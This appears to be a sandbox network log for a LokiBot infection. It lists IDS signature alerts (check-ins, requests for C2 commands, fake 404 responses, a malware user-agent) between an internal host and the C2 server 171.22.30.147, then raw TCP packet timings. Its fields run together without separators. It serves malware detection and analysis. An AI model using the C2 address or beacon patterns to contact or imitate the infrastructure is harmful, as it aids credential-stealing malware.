              192.168.2.3171.22.30.14749964802021641 01/05/23-08:53:30.400374TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497482025483 01/05/23-08:52:24.963164TCP2025483ET TROJAN LokiBot Fake 404 Response8049748171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749881802021641 01/05/23-08:53:04.500331TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749770802825766 01/05/23-08:52:31.112136TCP2825766ETPRO TROJAN LokiBot Checkin M24977080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749851802025381 01/05/23-08:52:56.435777TCP2025381ET TROJAN LokiBot Checkin4985180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749983802825766 01/05/23-08:53:35.478290TCP2825766ETPRO TROJAN LokiBot Checkin M24998380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749885802825766 01/05/23-08:53:05.575803TCP2825766ETPRO TROJAN LokiBot Checkin M24988580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497512025483 01/05/23-08:52:25.845383TCP2025483ET TROJAN LokiBot Fake 404 Response8049751171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749934802025381 01/05/23-08:53:20.304475TCP2025381ET TROJAN LokiBot Checkin4993480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749894802825766 01/05/23-08:53:08.006895TCP2825766ETPRO TROJAN LokiBot Checkin M24989480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749980802825766 01/05/23-08:53:34.702395TCP2825766ETPRO TROJAN LokiBot Checkin M24998080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497322025483 01/05/23-08:52:20.491522TCP2025483ET TROJAN LokiBot Fake 404 Response8049732171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749935802024313 01/05/23-08:53:20.565175TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497732025483 01/05/23-08:52:31.998630TCP2025483ET TROJAN LokiBot Fake 404 Response8049773171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750041802025381 01/05/23-08:53:52.410718TCP2025381ET TROJAN LokiBot Checkin5004180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749825802825766 01/05/23-08:52:47.903129TCP2825766ETPRO TROJAN LokiBot Checkin M24982580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499612025483 01/05/23-08:53:29.675200TCP2025483ET TROJAN LokiBot Fake 404 Response8049961171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497102025483 01/05/23-08:52:11.755900TCP2025483ET TROJAN LokiBot Fake 404 Response8049710171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497952025483 01/05/23-08:52:39.801322TCP2025483ET TROJAN LokiBot Fake 404 Response8049795171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749723802021641 01/05/23-08:52:17.811814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749908802825766 01/05/23-08:53:13.214132TCP2825766ETPRO TROJAN LokiBot Checkin M24990880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749701802825766 01/05/23-08:52:07.731855TCP2825766ETPRO TROJAN LokiBot Checkin M24970180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749812802021641 01/05/23-08:52:44.412618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749914802825766 01/05/23-08:53:14.852027TCP2825766ETPRO TROJAN LokiBot Checkin M24991480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749717802024313 01/05/23-08:52:14.673219TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749800802024318 01/05/23-08:52:41.099242TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750045802024313 01/05/23-08:53:53.481872TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749809802021641 01/05/23-08:52:43.596832TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498162025483 01/05/23-08:52:45.565007TCP2025483ET TROJAN LokiBot Fake 404 Response8049816171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750041802825766 01/05/23-08:53:52.410718TCP2825766ETPRO TROJAN LokiBot Checkin M25004180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749800802024313 01/05/23-08:52:41.099242TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749760802021641 01/05/23-08:52:28.304789TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749855802021641 01/05/23-08:52:57.514506TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500292025483 01/05/23-08:53:49.195503TCP2025483ET TROJAN LokiBot Fake 404 Response8050029171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750057802021641 01/05/23-08:53:56.743180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749960802025381 01/05/23-08:53:28.475539TCP2025381ET TROJAN LokiBot Checkin4996080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749782802025381 01/05/23-08:52:36.098088TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749914802025381 01/05/23-08:53:14.852027TCP2025381ET TROJAN LokiBot Checkin4991480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750002802024313 01/05/23-08:53:40.505314TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749699802025381 01/05/23-08:52:06.870270TCP2025381ET TROJAN LokiBot Checkin4969980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749996802021641 01/05/23-08:53:38.933239TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497542025483 01/05/23-08:52:26.735221TCP2025483ET TROJAN LokiBot Fake 404 Response8049754171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749877802025381 01/05/23-08:53:03.433942TCP2025381ET TROJAN LokiBot Checkin4987780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749862802825766 01/05/23-08:52:59.436708TCP2825766ETPRO TROJAN LokiBot Checkin M24986280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749934802825766 01/05/23-08:53:20.304475TCP2825766ETPRO TROJAN LokiBot Checkin M24993480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749779802825766 01/05/23-08:52:35.235559TCP2825766ETPRO TROJAN LokiBot Checkin M24977980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497172025483 01/05/23-08:52:14.761442TCP2025483ET TROJAN LokiBot Fake 404 Response8049717171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749938802024313 01/05/23-08:53:21.374225TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749938802024318 01/05/23-08:53:21.374225TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749957802825766 01/05/23-08:53:26.768134TCP2825766ETPRO TROJAN LokiBot Checkin M24995780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750002802024318 01/05/23-08:53:40.505314TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749756802825766 01/05/23-08:52:27.231494TCP2825766ETPRO TROJAN LokiBot Checkin M24975680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500572025483 01/05/23-08:53:56.827355TCP2025483ET TROJAN LokiBot Fake 404 Response8050057171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498532025483 01/05/23-08:52:57.043641TCP2025483ET TROJAN LokiBot Fake 404 Response8049853171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499802025483 01/05/23-08:53:34.784528TCP2025483ET TROJAN LokiBot Fake 404 Response8049980171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750021802025381 01/05/23-08:53:46.361205TCP2025381ET TROJAN LokiBot Checkin5002180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749980802025381 01/05/23-08:53:34.702395TCP2025381ET TROJAN LokiBot Checkin4998080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750018802825766 01/05/23-08:53:44.999195TCP2825766ETPRO TROJAN LokiBot Checkin M25001880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750077802021641 01/05/23-08:54:02.067623TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749983802025381 01/05/23-08:53:35.478290TCP2025381ET TROJAN LokiBot Checkin4998380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498252025483 01/05/23-08:52:47.996157TCP2025483ET TROJAN LokiBot Fake 404 Response8049825171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749749802021641 01/05/23-08:52:25.162571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749832802021641 01/05/23-08:52:49.809310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749820802024318 01/05/23-08:52:46.558490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498032025483 01/05/23-08:52:41.982616TCP2025483ET TROJAN LokiBot Fake 404 Response8049803171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749820802024313 01/05/23-08:52:46.558490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499522025483 01/05/23-08:53:25.281435TCP2025483ET TROJAN LokiBot Fake 404 Response8049952171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749823802024318 01/05/23-08:52:47.379297TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749783802024313 01/05/23-08:52:36.372208TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749786802024313 01/05/23-08:52:37.217550TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749878802021641 01/05/23-08:53:03.704233TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497672025483 01/05/23-08:52:30.379314TCP2025483ET TROJAN LokiBot Fake 404 Response8049767171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749961802024318 01/05/23-08:53:29.597138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749964802024313 01/05/23-08:53:30.400374TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499302025483 01/05/23-08:53:19.298581TCP2025483ET TROJAN LokiBot Fake 404 Response8049930171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749961802024313 01/05/23-08:53:29.597138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749786802024318 01/05/23-08:52:37.217550TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749783802024318 01/05/23-08:52:36.372208TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749964802024318 01/05/23-08:53:30.400374TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497452025483 01/05/23-08:52:24.104430TCP2025483ET TROJAN LokiBot Fake 404 Response8049745171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749954802825766 01/05/23-08:53:25.726692TCP2825766ETPRO TROJAN LokiBot Checkin M24995480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497822025483 01/05/23-08:52:36.186611TCP2025483ET TROJAN LokiBot Fake 404 Response8049782171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749776802825766 01/05/23-08:52:33.619524TCP2825766ETPRO TROJAN LokiBot Checkin M24977680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749736802025381 01/05/23-08:52:21.543284TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749823802024313 01/05/23-08:52:47.379297TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750001802025381 01/05/23-08:53:40.243949TCP2025381ET TROJAN LokiBot Checkin5000180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749717802024318 01/05/23-08:52:14.673219TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749937802825766 01/05/23-08:53:21.090422TCP2825766ETPRO TROJAN LokiBot Checkin M24993780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749759802825766 01/05/23-08:52:28.024665TCP2825766ETPRO TROJAN LokiBot Checkin M24975980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749835802021641 01/05/23-08:52:50.902278TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749808802025381 01/05/23-08:52:43.325468TCP2025381ET TROJAN LokiBot Checkin4980880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750045802024318 01/05/23-08:53:53.481872TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749714802024313 01/05/23-08:52:13.349412TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749803802024318 01/05/23-08:52:41.905218TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500412025483 01/05/23-08:53:52.491665TCP2025483ET TROJAN LokiBot Fake 404 Response8050041171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498312025483 01/05/23-08:52:49.622210TCP2025483ET TROJAN LokiBot Fake 404 Response8049831171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750048802024313 01/05/23-08:53:54.265201TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750048802024318 01/05/23-08:53:54.265201TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499682025483 01/05/23-08:53:31.591227TCP2025483ET TROJAN LokiBot Fake 404 Response8049968171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749963802025381 01/05/23-08:53:30.141323TCP2025381ET TROJAN LokiBot Checkin4996380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749852802021641 01/05/23-08:52:56.705137TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749763802021641 01/05/23-08:52:29.176849TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749941802021641 01/05/23-08:53:22.165125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750008802021641 01/05/23-08:53:42.094852TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749785802025381 01/05/23-08:52:36.951784TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749874802025381 01/05/23-08:53:02.624496TCP2025381ET TROJAN LokiBot Checkin4987480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749898802024313 01/05/23-08:53:09.845609TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749987802024318 01/05/23-08:53:36.549688TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499242025483 01/05/23-08:53:17.670335TCP2025483ET TROJAN LokiBot Fake 404 Response8049924171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749898802024318 01/05/23-08:53:09.845609TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749987802024313 01/05/23-08:53:36.549688TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749716802025381 01/05/23-08:52:14.357533TCP2025381ET TROJAN LokiBot Checkin4971680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749981802024313 01/05/23-08:53:34.961120TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749710802025381 01/05/23-08:52:11.662757TCP2025381ET TROJAN LokiBot Checkin4971080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749805802025381 01/05/23-08:52:42.467353TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749892802024313 01/05/23-08:53:07.470439TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749739802025381 01/05/23-08:52:22.339123TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497392025483 01/05/23-08:52:22.422279TCP2025483ET TROJAN LokiBot Fake 404 Response8049739171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749828802025381 01/05/23-08:52:48.735651TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498752025483 01/05/23-08:53:02.993352TCP2025483ET TROJAN LokiBot Fake 404 Response8049875171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500792025483 01/05/23-08:54:02.671781TCP2025483ET TROJAN LokiBot Fake 404 Response8050079171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749981802024318 01/05/23-08:53:34.961120TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749892802024318 01/05/23-08:53:07.470439TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749915802024313 01/05/23-08:53:15.112176TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749917802025381 01/05/23-08:53:15.635846TCP2025381ET TROJAN LokiBot Checkin4991780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750025802024318 01/05/23-08:53:48.086655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750061802825766 01/05/23-08:53:57.824423TCP2825766ETPRO TROJAN LokiBot Checkin M25006180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750067802825766 01/05/23-08:53:59.373237TCP2825766ETPRO TROJAN LokiBot Checkin M25006780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750054802021641 01/05/23-08:53:55.890469TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749737802024313 01/05/23-08:52:21.818381TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749826802024313 01/05/23-08:52:48.184567TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749714802024318 01/05/23-08:52:13.349412TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749803802024313 01/05/23-08:52:41.905218TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749986802025381 01/05/23-08:53:36.285692TCP2025381ET TROJAN LokiBot Checkin4998680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749740802021641 01/05/23-08:52:22.636691TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749737802024318 01/05/23-08:52:21.818381TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749826802024318 01/05/23-08:52:48.184567TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749989802025381 01/05/23-08:53:37.099082TCP2025381ET TROJAN LokiBot Checkin4998980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750025802024313 01/05/23-08:53:48.086655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750022802024313 01/05/23-08:53:46.665385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749897802025381 01/05/23-08:53:09.055046TCP2025381ET TROJAN LokiBot Checkin4989780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749915802024318 01/05/23-08:53:15.112176TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749780802024313 01/05/23-08:52:35.511333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498812025483 01/05/23-08:53:04.594550TCP2025483ET TROJAN LokiBot Fake 404 Response8049881171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499182025483 01/05/23-08:53:16.001398TCP2025483ET TROJAN LokiBot Fake 404 Response8049918171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749780802024318 01/05/23-08:52:35.511333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498972025483 01/05/23-08:53:09.137400TCP2025483ET TROJAN LokiBot Fake 404 Response8049897171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749713802025381 01/05/23-08:52:12.826844TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499022025483 01/05/23-08:53:11.691862TCP2025483ET TROJAN LokiBot Fake 404 Response8049902171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749984802024313 01/05/23-08:53:35.743967TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749842802825766 01/05/23-08:52:54.011182TCP2825766ETPRO TROJAN LokiBot Checkin M24984280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749984802024318 01/05/23-08:53:35.743967TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749931802825766 01/05/23-08:53:19.484274TCP2825766ETPRO TROJAN LokiBot Checkin M24993180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749802802025381 01/05/23-08:52:41.641382TCP2025381ET TROJAN LokiBot Checkin4980280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749753802825766 01/05/23-08:52:26.326305TCP2825766ETPRO TROJAN LokiBot Checkin M24975380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750022802024318 01/05/23-08:53:46.665385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749947802021641 01/05/23-08:53:23.814636TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4994780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500632025483 01/05/23-08:53:58.415827TCP2025483ET TROJAN LokiBot Fake 404 Response8050063171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750024802025381 01/05/23-08:53:47.812882TCP2025381ET TROJAN LokiBot Checkin5002480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749858802021641 01/05/23-08:52:58.341182TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750051802021641 01/05/23-08:53:55.100340TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749829802024318 01/05/23-08:52:49.001962TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749918802024318 01/05/23-08:53:15.920283TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749769802021641 01/05/23-08:52:30.825016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749829802024313 01/05/23-08:52:49.001962TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750064802825766 01/05/23-08:53:58.597698TCP2825766ETPRO TROJAN LokiBot Checkin M25006480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749918802024313 01/05/23-08:53:15.920283TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991880192.168.2.3171.22.30.147
              TimestampSource PortDest PortSource IPDest IP
              Jan 5, 2023 08:52:06.839880943 CET4969980192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:06.867167950 CET8049699171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:06.867285967 CET4969980192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:06.870270014 CET4969980192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:06.897475004 CET8049699171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:06.897677898 CET4969980192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:06.925846100 CET8049699171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:06.954988956 CET8049699171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:06.955018044 CET8049699171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:06.955135107 CET4969980192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:06.955419064 CET4969980192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:06.982395887 CET8049699171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.321518898 CET4970080192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.349001884 CET8049700171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.349236012 CET4970080192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.351938009 CET4970080192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.379162073 CET8049700171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.379388094 CET4970080192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.406955957 CET8049700171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.435997963 CET8049700171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.436028004 CET8049700171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.436168909 CET4970080192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.436228991 CET4970080192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.463627100 CET8049700171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.701452971 CET4970180192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.728910923 CET8049701171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.729079008 CET4970180192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.731854916 CET4970180192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.758996964 CET8049701171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.759093046 CET4970180192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.786366940 CET8049701171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.816133976 CET8049701171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.816170931 CET8049701171.22.30.147192.168.2.3
              Jan 5, 2023 08:52:07.816405058 CET4970180192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:07.826524973 CET4970180192.168.2.3171.22.30.147
              Jan 5, 2023 08:52:08.117568016 CET4970280192.168.2.3171.22.30.147
